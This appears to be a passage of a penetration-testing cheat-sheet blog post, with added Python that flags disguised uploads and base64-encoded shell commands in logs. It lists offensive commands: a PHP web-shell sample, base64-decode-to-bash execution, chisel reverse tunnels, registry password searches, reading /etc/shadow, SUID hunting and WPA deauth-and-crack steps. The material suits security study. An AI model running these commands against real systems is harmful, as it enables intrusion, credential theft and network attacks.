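    expected = EXTENSION_TYPE.get(ext)
    if expected is None:
        return detected, "unchecked"
    return detected, "ok" if detected == expected else "mismatch"


SAMPLES = {  # constructed blobs, not real files
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
    "hex.bz2": hex_to_bytes("42 5a 68 39 31 41 59 26 53 59"),   # BZh91AY&SY
    "avatar.png": b"<?php echo shell_exec($_GET['cmd']); ?>",  # script in disguise
    "update.exe": b"\x7fELF\x02\x01\x01\x00",                  # wrong platform
}


if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print("%-12s -> %s" % (name, check_upload(name, blob)))
```

The mismatch verdict is the interesting one for an upload handler or a forensic triage script: a "png" that starts with `<?php` or an "exe" that is really an ELF is worth a second look, and the check costs a read of a few bytes.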
Base64 encode decode
base64 filename.exe > file.txt
base64 -d file.txt > filename.exe
Base64 command and execute
echo ls /home | base64
bHMgL2hvbWUK
echo bHMgL2hvbWUK | base64 -d | bash
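The `echo <base64> | base64 -d | bash` pattern above is common enough that it is worth detecting in process-command-line logging. As an added example, not part of the original notes, the script below pulls base64-looking tokens out of log lines, decodes the ones that are valid base64 and clean text, and flags those that read like shell commands. The log records are constructed for the demo, and the hint list is a deliberately small starting point.

```python
#!/usr/bin/env python3
"""Added example (not from the notes): spot encoded commands of the form
`echo <base64> | base64 -d | bash` in command-line logs. Log records and the
hint list are constructed for the demo."""
import base64
import binascii
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
SHELL_HINTS = ("/bin/", "/dev/tcp", "/etc/", "bash", " sh ", "wget ", "curl ",
               "nc ", "ls ", "cat ", "python", "chmod ")


def decode_candidates(text):
    """(token, decoded text) for every token that decodes to clean ASCII."""
    out = []
    for match in B64_TOKEN.finditer(text):
        token = match.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue                      # wrong length or padding: not base64
        try:
            decoded = raw.decode("ascii")
        except UnicodeDecodeError:
            continue                      # binary data, not an encoded command
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            out.append((token, decoded))
    return out


def suspicious_commands(line):
    """Decoded payloads in this line that look like shell commands."""
    hits = []
    for _token, decoded in decode_candidates(line):
        if any(hint in decoded for hint in SHELL_HINTS):
            hits.append(decoded.strip())
    return hits


def scan_log(lines):
    """(record id, flagged commands) for every line that has at least one hit."""
    results = []
    for line in lines:
        hits = suspicious_commands(line)
        if hits:
            results.append((line.split()[0], hits))
    return results


def _b64(text):
    """Helper for building the constructed samples below."""
    return base64.b64encode(text.encode()).decode()


SAMPLE_LOG = [  # constructed process-command-line records
    "pid=4012 cmd=echo bHMgL2hvbWUK | base64 -d | bash",
    "pid=4013 cmd=/usr/bin/python3 /opt/app/worker.py --queue default",
    "pid=4014 cmd=sh -c 'echo %s | base64 -d | sh'" % _b64("cat /etc/shadow"),
    "pid=4015 cmd=curl -H 'Authorization: Basic %s' https://api.example.test/" % _b64("bobby:tables"),
]


if __name__ == "__main__":
    for record, hits in scan_log(SAMPLE_LOG):
        print(record, "->", hits)
```

The Basic-auth header in the last record shows why decoding alone is not enough: it is valid base64 and valid text, but it contains nothing shell-like, so it stays quiet. Tune SHELL_HINTS to the environment and keep the length floor in B64_TOKEN; dropping it makes every short word a candidate.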
ProxyChains
Coming
Chisel
TCP tunnel over HTTP
https://github.com/jpillora/chisel.git
Attacker
chisel server -p 8000 --reverse -v
Client (victim)
chisel client 172.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Windows Privilege Escalation
systeminfo
hostname
echo %username%
net users
ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Sysinternals
accesschk.exe
net start
net stop
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s >pass.txt
reg query HKCU /f password /t REG_SZ /s >>pass.txt
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
Find writable files
dir /a-r-d /s /b
Empire Setup
git clone https://github.com/EmpireProject/Empire.git -b dev
cd Empire
cd setup
./setup.sh
PowerShell
Invoke-AllChecks
Linux Privilege Escalation
The things that I have used from this page are:
# Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
# SGID (chmod 2000) – run as the group, not the user who started it.
find / -perm -g=s -type f 2>/dev/null
# SUID (chmod 4000) – run as the owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in $(locate -r "bin$"); do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
LinEnum
./LinEnum.sh -t > kali.txt
Commands
cat /etc/issue
cat /etc/lsb-release
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ps aux | grep root
crontab -l
Port forward
ssh -L 8080:127.0.0.1:80 root@192.168.1.1
ssh -R 8080:127.0.0.1:80 root@192.168.1.1
Binary Exploitation
Tools
OllyDbg
Immunity Debugger
gdb
Binary Ninja
Stacks
Buffers
Fuzzing
Registers
EAX
ECX
EDX
EBX
ESP
EBP
ESI
EDI
EIP Control the path of Code execution
Debug Applications
r2
aaa (analyse all)
afl (list functions)
pdf @ main
pdc @ main (decompile as C-like pseudocode)
ldd lists the libraries an application links against
ldd /usr/
Ruby pattern create tool
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
Ruby: find the offset of the pattern that ended up in EIP
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb
Ruby: assemble JMP ESP to get its opcode bytes
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
Shrink Go Binaries
go build -ldflags="-s -w"
and
upx --brute chisel
Tcpdump ICMP packets
tcpdump -i eth0 icmp -n
Covering Tracks
Metasploit
Linux tips and tricks
Updatedb
Update database for mlocate
updatedb
Count characters
echo -n asjdflkjalskdjflkjasdfljldkf | wc -c
md5sum
echo -n 'asjdflkjalskdjflkjasdfljldkf' | md5sum
Run a command immune to hangups
nohup
Wireless
### Check config
iwconfig
### Enable monitor mode
airmon-ng start wlan0
iwconfig
### Look for APs
airodump-ng wlan0mon
### Look for clients
airodump-ng --bssid <ap> --channel <ap channel> wlan0mon
### Start recording
airodump-ng --bssid <ap> --channel <ap channel> --showack -w wpa_log wlan0mon
### Deauth
aireplay-ng -0 20 -a <ap> -c <client> wlan0mon
### Crack
aircrack-ng wpa_log.cap -w /usr/share/wordlists/rockyou.txt
Links
Exploits
https://www.exploit-db.com/google-hacking-database
John The Ripper
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Linux Priv Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Magic Numbers
https://en.wikipedia.org/wiki/List_of_file_signatures
Stego Links
https://www.dcode.fr/caesar-cipher
https://www.splitbrain.org/_static/ook/
https://incoherency.co.uk/image-steganography/#unhide
Github tools
0d1n
Door404
Hacking-Tools-Repository
massExpConsole
routersploit
Sublist3r
airgeddon
DorkMe
hashcat-legacy
metagoofil
scavenger
takeover
aron
droopescan
hashstack-server-plugin-jtr
nemesis
SecLists
TheFatRat
AutoSploit
EagleEye
InSpy
osint-scraper
seeker
Trity
badKarma
Eternalblue-Doublepulsar-Metasploit
Leaked
osrframework
SharpHound
wordlist
Bashark
exploitpack-master
linpostexp
Photon
SiteBroker
wpscan
BloodHound
firesheep
Log-killer
PowerSploit
SocialBox
xerxes
Cl0neMast3r
fuxploider
lscript
pywerview
SocialFish
Cortex-Analyzers
Gopherus
machine_learning_security
ReconDog
sshng2john
DarkSpiritz
hackbox
mail-security-tester
RED_HAWK
stash.sqlite
OMG insane
Wow, this is great resource. Could you flick me a email, would like to chat more about the certs.
Done!